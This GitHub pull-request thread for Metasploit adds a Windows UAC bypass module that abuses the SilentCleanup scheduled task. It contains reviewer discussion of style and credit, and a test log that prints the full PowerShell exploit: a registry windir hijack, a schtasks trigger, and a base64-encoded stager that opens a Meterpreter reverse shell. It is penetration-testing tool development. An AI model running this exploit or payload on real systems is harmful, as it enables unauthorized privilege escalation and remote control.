WIP: Create SilentCleanup UAC Bypass module
rapid7/metasploit-framework pull request #11997
Opened 2019-06-20 18:02 UTC by cbrnrd

This PR adds a module that bypasses UAC via the "SilentCleanup" task in Windows Task Scheduler

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a session
- [ ] `use exploit/windows/smb/local/bypassuac_silentcleanup`
- [ ] `set session 1`
- [ ] `run`
- [ ] Get an elevated session

## TODO
 * **Getting it to work**
I have tried for days but I cannot figure out the proper configuration for `cmd_psh_payload` to work when in a PS1 context. *Any help would be greatly appreciated.*
 * Docs

## References
https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

2019-06-20 18:30 UTC, NickTyrer commented
@cbrnrd I added:
      'Arch'        => [ARCH_X86, ARCH_X64],
      'Targets'     => [['Microsoft Windows', {}]],
to allow me to use a 64bit payloads and the module worked fine.

2019-06-20 18:39 UTC, cbrnrd commented
@NickTyrer 
![You are my god](https://media.giphy.com/media/3o6EhVqAY0JNGNLlU4/giphy.gif)

2019-06-21 19:51 UTC, wvu requested changes
Thanks for the contribution, @cbrnrd! I have completed my first pass of review, but there are some questions that need to be answered. Thanks!

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +  def check_permissions!
See previous comment.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +
Blank line.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +
Blank line. Match it to `class` or delete it.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +
Blank line.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +
Blank line.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +
Blank line.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +      vprint_status("Uploading payload PS1...")
Single quotes.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +
Blank line.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +        'lokiuox'     # Vuln discovery
Weird spacing here, too.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    vprint_good "Payload uploaded to #{payload_fp}"
Parens for consistency.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    if admin_group.nil?
You could replace this negative/nested logic with a `case` statement. Just a thought.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    # Write it to disk, run, delete
Is it really necessary to write anything to disk? It looks like you can execute this bypass entirely in memory.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +        'lokiuox'     # Vuln discovery
Are you sure @lokiuox discovered the bypass? Looks like they wrote the script and dropped it on Hak5 forums.

https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

@enigma0x3 and @tyranid appear to be independent discoverers.

https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html

Researchers CC'd for further clarification.

2019-06-21 19:51 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
Can you not insert `cmd_psh_payload`?

2019-06-21 20:22 UTC, tyranid commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +        'lokiuox'     # Vuln discovery
While both me and @enigma0x3 used the SlientCleanup task the method I described is the one which matches the forum post. I can't claim that it wasn't discovered independently so do with it as you please, at the least you might want to add a link to the blog posts as it gives context to why it works over and above what the forum post contains. 

It's worth noting that MS stated they were fixing the environment variable trick in newer versions of Windows 10, I've no idea if this is true or not, you might want to double check the supported versions in case you get push back later with people saying it doesn't work. Same with early Windows versions, I don't know for a fact when the SilentCleanup task was introduced.

Also, in the latest version of the module it says it was disclosed on 24 Feb 2018, but the forum post is 24 Feb 2019 :-)

2019-06-21 20:25 UTC, lokiuox commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +        'lokiuox'     # Vuln discovery
Hi, I'm the author of the Hak5 post, I've NOT discovered this bypass, I've actually found the vuln on Reddit [here](https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/) and made the script.

2019-06-21 23:02 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +        'lokiuox'     # Vuln discovery
Awesome, thank you both!

@cbrnrd: Please add @tyranid and **nyshone69** to `Authors` and adjust contribution comments accordingly.

Also, please add the following URLs to `References`:

* https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html
* https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
* https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

2019-06-22 04:08 UTC, cbrnrd commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    # Write it to disk, run, delete
The exploit requires a PS1 script to be written to disk

2019-06-22 04:15 UTC, cbrnrd commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +      'Targets' => [['Microsoft Windows', {}]],
@tyranid I've only tested this on Windows 10 1809 x64. Have you (or anyone else) tested this on any other versions?

2019-06-22 07:24 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    # Write it to disk, run, delete
Roger that. I can test it out, but I believe you did your due diligence!

2019-06-22 07:26 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    if admin_group.nil?
Something like this could be cleaner:

```ruby
case admin_group
when nil
  print_error('Either whoami is not there or failed to execute')
  print_error('Continuing under assumption you already checked...')
when true
  print_good('Part of Administrators group! Continuing...')
when false
  fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
```

2019-06-22 10:42 UTC, lokiuox commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    # Write it to disk, run, delete
Actually, the exploit requires just that something to execute is on the disk, because the SilentCleanup task needs to call it from somewhere, but the type of the file is not important. I made the script in a way so that it has payload and exploit in the same file, but you can make SilentCleanup run any command, actually. You could even use an existing binary (e.g. from LOLBas), not dropping anything onto the disk, but then you have to encapsulate your whole payload in the %windir% variable, which is limited to something like ~100 characters iirc.

2019-06-25 05:18 UTC, cbrnrd commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
The payload isn't being inserted here

2019-06-25 05:20 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
I was asking if it could be, but I don't know yet.

2019-06-26 02:54 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
I'll mess around with this. On to testing! Thanks.

2019-06-26 02:54 UTC, wvu-r7 commented on modules/exploits/windows/local/bypassuac_silentcleanup.rb
> +    # Write it to disk, run, delete
Will play with this. Thanks!

2019-06-26 02:55 UTC, wvu approved these changes
Testing. :)

2019-06-27 16:22 UTC, wvu-r7 commented
Fixed `NameError` from refactor. Clean run after:

```
msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Part of Administrators group! Continuing...
[*] Powershell command length: 6591
[*] Uploading payload PS1...
[*]
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        powershell.exe -nop -w hidden -noni -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAE0AdgByAEYARgAwAEMAQQA3AFYAVwBhADIAKwBiAFMAQgBUADkAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE0AMwB6AFUAYQBxAHQASQBBAGgAeABqAFcASgBLAFQARgAyADcATABWAFcAQgBBAGEAWQBlAEgAZwBFAGgAdABpAGsAMgAvACsAKwBkADIAeABJAFUAegBXAHQAMgBwAFUAVwBJAFQARwBQACsAegB6ADMAegBGAHkAQwBNAHYARQBvAFQAaABPAHUAZgBOAEQAdgB1AGMAOQBIAGgAdwBjAFQATgAzAGQAagBUAG0AaAB0AGYAYQBQAE4AdABSADQAZgB4AEkATQBEAFcARwAyAGwAcwA1AGwAdQBjAGgAOAA0AFkAUwBsAG4AMgBTAEMATgBYAFoAeQBzAEwAaQA3AFUATQBzADkAUgBRAHYAZgB6AHoAaQBXAGkAYwBsAEcAZwArAEkANQBnAFYAQQBnAGkAOQB3ADgAMwBpADEAQwBPAFQAcQA3AHYANwBwAEYASAB1AGMAOQBjADYAKwAvAE8ASgBVAG4AdgBYAEYASwBMAFYAYQByAHIAUgBZAGcANwBrAFIATwBmADcAWQAxAFQAegAyAFgAQgBkAE8AeQBNAFkAQwByAHcAZgAvADMARgBpADgAdQBUADMAcQBxAGoAUABaAFEAdQBLAFEAVABlAHIAZwBxAEsANABvADUAUABDAEMAOQB5AFgAMABUAG0AOABLAGIASwBrAE0AQwBiADIATQB2AFQASQBnADEAbwBaADQAYQBUAHQANgBlAGQAYQBWAEsANABBAGIAbwBDAGEANAAvAEkAUgBEAFIASwAvAFkASQBYAEkAUQAxADQAYwAwAFQATABQAE8ASAAyAEMAVABFAEwAKwAzADIAQgBoACsARQBrAFQAegAzAFoAOQAzAE4AVQBGAEgAeQBiAFcAegBMAGIAeQA5AFgAcQBUADIARgBaAE8ALwA1AFUASgBoAFQASABxAEcATQBrAEYATwBWAHAAWgBxAFAAOABFAFgAdQBvADYAQQB6AGQAeABDAGYAbwBFAHcAcABXAG8ARwBYAFQASABDAGYAaABTAGgAUgBCADcARABGAGQASQA2AEcAVgBsAEkAUwAwAHUAZAA4AHgASQAxAHkAaABUAFEAUABiAHIAeQBvAEoATAA1AFYAQQBhAGsASgB6AHMAUQAyAEYAZgBDADEAUgBNAC8AVgBMAGcAdgBhAHEALwBDAHUAUgBzAHUAcQBMADgATwB3AFoAQQBNAGgAOQBPAFQAbwA4AE8AZwB3AGEAcwB2AGgAUABMADYAawBDAG8ANABQAGwAYgBvAHcAZwBOAEcARwBTAEYAbgBnAG4AOQBZAEcAVAAyAHAAdwBKAFAAbAB5AGEANQBoAFYATQBXAHoAZAA1AGkAYwBUAFYATQA3AEIAYwB5ADgAMgBpADkAbwAvAFYAZQA0ADAAcwBTAFAAcABCAHAAcwBEAFMAMABrAG0AeAB2AHcASwBWAHUAcABxAHQAYwBuAEUAMgAwAGQAagBHAGoAMgBrADUAUQBBAEYATwAwAEsAQgBLADMAQgBoADcARABmAE8ARQAxAHkAQgBHAEEAVQBHADcARABEAHUATgAyAEIAVgBFAEoAZgBEADEAQgB2AEkASABpAEsARABRAHAAUQB3AHoAVgB1AG4AdgAxAEwAUQBZADAAMgBkAGQAcABjAFQARQBSADcAbgBzAFEAWgBrAEsAaQBBAG8AcQBLAEgANABiAHoATAA0AE0AQQBtADgAawBKAG8AbwBCAG8ALwAwAGMAcQBOAGMASwBnAE8AKwBvAGsAYQA0ADUAWABqAFgAZQAyAFIAeQBFAGUASgBXADQAUgBkAEgAbQBKAGkAVQBjAE8ASwAvAE4AMgBjAGcAbAB5AEcAOQB6AGMAbABMAGcAZQBrAHMAdQBhAGIAbwBiADgAbAAvAEQATgBVAHQAQwBzAGUAYwBXAHQARABHADMARQBwACsAQgByAEIAMgBxAGEAVgBMAFEAdgBQAFMAZwBiAHAARAA4AGoAWgAwAGgARAA3AHUARQBZAGQASABtAGgAdABoAEgAUwBtAFgAagBzAEgASABNAHYANABxAEUANgBoAEkAQwB4AHcAQQBzAFAAVQBJAGwAWQBJAFUAaABZAEYAUABHAGgAaAB4AGkAWgBKAFUAWABPAHoAYQBpAFIAcAB3AFIARgBJAFAASQA3AHUAVAByAHgAQQAzAGgAbgBOAGQAYwAzADcASABIAEQAWgBIAFAAZgB4AGQAaAB3ACsAVQA5AGMAUgBrAFkARABRAG8AdgA0AG8ATQBLADIAeQBTAGwAYgBjADcAQgBPAFkAVQBiAGgAQQBIAEwAZQBQAFMAZgAzAEwAKwA0AE8AdgBhAEIAcQBEAG0AcQBhAHkARQAwAEIAMgBTAHAAVgBKAFEAUgB1ADUAVQBzAEoAbwB5AFQATgBTAHcANwBFAEgASQBLAEEATwBoADUARwBpAHQAdQBnAGMANwA2ACsAMQB0AEMAZQBOAFAAVgA4AE8ARABkAFoASgBBACsAeQBmAEIAbwArAGkAZgBMAFUAZQB5AHAAcwB6AEIATQBmADAAUgBzAGcAOQBxADMARwBoADUAUABvADgAagBBAFAAUwBPAEUAZQBUAFgAVgB3AGcAbQBWAHMAbwA4ADMATgA4AE8AUgBQAFIAagBLACsAVwBBAGIAQgBiAEoAUgBHAE4AcABRAHEAYQB5AGUASQBuAHQARAAvAE4ANABaAEsAZABNAHAANgBHAEYAMQBiAE4AMQB2AEQAZABsAFgANABuAEEAZQAzAHEAbwBiAFkAeABMAE4ARABYAEMAawBqAGsATQBqAGgASwA5AGkAUgBKADQAaQBMAGEAUgBRAGsAWABSADEAYgBDAHUAUgBoAGkAVQA1AHQASwAyAGgAMQBlADgAdABqAE8ANAA1AFUAZgBDAFQAYgBkAGoAeQBjAFAAYgBzADcAOQBtAFAAMQB1ADgAUAA1ADkAcwBiACsAYwBvAGMAeQBaAEYAKwA3AGUAdQA5AFUAMwAyAG4AdgAyAGIANgBpAC8AWABsAGUASwBEAHQANQBoADYAYgBXADcAZQBGAGgAagBYAHcAbwArAG0AMwBsAGgATwBoAG0AWgBNAHAATQAwADEAZgBXAEUANQBtAGgATQBlAGIAMABIAEwARwAzAGIANABlAEsAYgBCAHUANABPADAANABzADcAdgB3ADkASABxAGoAeAA4AFIALwBNAHMAbgA1AGsAdwBuAGgAVwBzADUAaQBoAE4ASABDAEMARgBFAFYAeQBwAFkAcwAyADcAYwBKAHMAZQA4ADIAcQBxAHoAbwAzAHUAWgBqADIASgBlAG4AKwBoAFQAVwAxAGoAZABHAHMAcgBYAHUATQB0AE8AdgBiAG8AZgBkAFAAeAB3AFQAbwB5AHkAVgBMAFUAMgBXAGQAUQBKAG4ATQBwAGIAZAB6AGEARABiAG0ANgBXAEsANQBiAHkAegBwAHAAcQAwAHIAYQBiAFMAZABxAFAAZABkAHoAYwBhAEgAbQAzAFcAOQBYAGQANgBlAFgAWQBXAGQAbwBQACsAcABPAHYAWQBSAGoASgAwAEkAdwBYAGkAcgBVAGIAOQBOAFIANABkAHcAMQA3AHMATwB0AEoAdAAwAEgAVQBZAGYAZwBNAHQANgBUADQAbABjACsASgBPADEARgA1AEsANwByAHEAOQBLAFIANgA4AFYAeABRAEQAbwA5AEcAVgA2AFoARQBIAEIAWABJAEcARwArACsAcwB1ADEAUQA5ADkAYQBJAEEAWQBqAEwAQwBjAHkAdQBjAHAAOABtAHAAdQB3AGEANwBzADEAQwBHADYAQwBBAC8AcQBIAE0AdwBNAGsAQgBIAEsAUQBsAGUAVAA0AC8AbgB6AE4AWgBvAEkAOABXAGoAcgBjAFQAaQBqAEUAZgBuAEUATgB0AHAASABZAE4ATQBFADIAUABlAGgAZgBqAGsANABjAEIAVwBrADAAdgBiAG0ASgAvADYAUwBGAGUANgB4ADkANgBIAE4ANAB5AHoAUQBOAHAAVwB2AHIAMQArAFEAYwBVAGYAZABSAEgAVAB6AFkAdgBJAEoAVQBCAFIANgBBADcATgB4AGEAQwBuAHUAVgA1AGYAKwBaAE0AVQBNAHcAMQBCADIAUAAwAG4AcgBGAEcAZQBJAEEASgA5AEYAagBwAHgAYwA3AGgAawBRAGwASwBQAE4AUgB4AG8ARAB0AEQAcQA5AGcAMgBJADkAYwBNAHAARABOACsAZQB2AGoAbwBTAHUAVwBkAEIAOABXAHMAWABhAHAAWQB1AEwAaABZAFEASQB4AHgAVwBPAEUAMgBkAE0AVQBwAEMARwByAFcAbAA3AFYAdABKAGcAcgBZAGkAYgBmAHMAUwBaAFAAagByAGEAYQBsAHAAVgBnAG4ATQBVAHAAdAAxAEoAWQBaAEsAYgBaAGoAcwBEAEkAdgBzACsATQBLAHQANgAvADIALwBXAE4AVgAzAFIAZwBRAGYALwArAGQAWQBmAFYAMwA3AHkAZQA0AHYANABTAGUAMQBkADkAbAArAHQALwByAHQAdwBtACsAQgArAGQAdAA1AHoAMQB4AE0AUQBkAEsARwBLADQAKwBnAGYAZABOADkATABmADIAYQBGAFMAOQArAFMASwBBAGkAVQBQAE8AZwBmAHQAZwB2ADUAWABWAEoAVAA2ADcAZwBOACsAWABvADgARgArAGsAeQBBAG0AdgB2AEEAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
      } else {
          $registryPath = "HKCU:\Environment"
          $Name = "windir"
          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
          Set-ItemProperty -Path $registryPath -Name $name -Value $Value
          #Depending on the performance of the machine, some sleep time may be required before or after schtasks
          Start-Sleep -Milliseconds 0
          schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
          Remove-ItemProperty -Path $registryPath -Name $name
      }

[+] Payload uploaded to C:\Windows\TEMP\PbHjYLmP.ps1
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49159) at 2019-06-27 11:16:14 -0500
[+] Deleted C:\Windows\TEMP\PbHjYLmP.ps1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf5 exploit(windows/local/bypassuac_silentcleanup) >
```

2019-06-27 16:40 UTC, wvu-r7 commented
I added @enigma0x3 as an independent discoverer. The added https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ reference should be helpful, too. I also fixed a typo where **byshone69** should be **nyshone69**. :-)

2019-06-27 16:44 UTC, wvu-r7 commented
Also, I love unquoted paths. Such classic behavior. :')

2019-06-27 16:54 UTC, merged

2019-06-27 16:54 UTC, wvu-r7 commented
Landed after final changes. We can iterate on this going forward. Thanks, everyone!

2019-06-27 16:56 UTC, wvu-r7 commented
# Release Notes

This adds a UAC bypass using an unquoted path in the SilentCleanup scheduled task for Windows.

2019-06-27 21:36 UTC, cbrnrd commented
Thanks for the final touch up's @wvu-r7 👏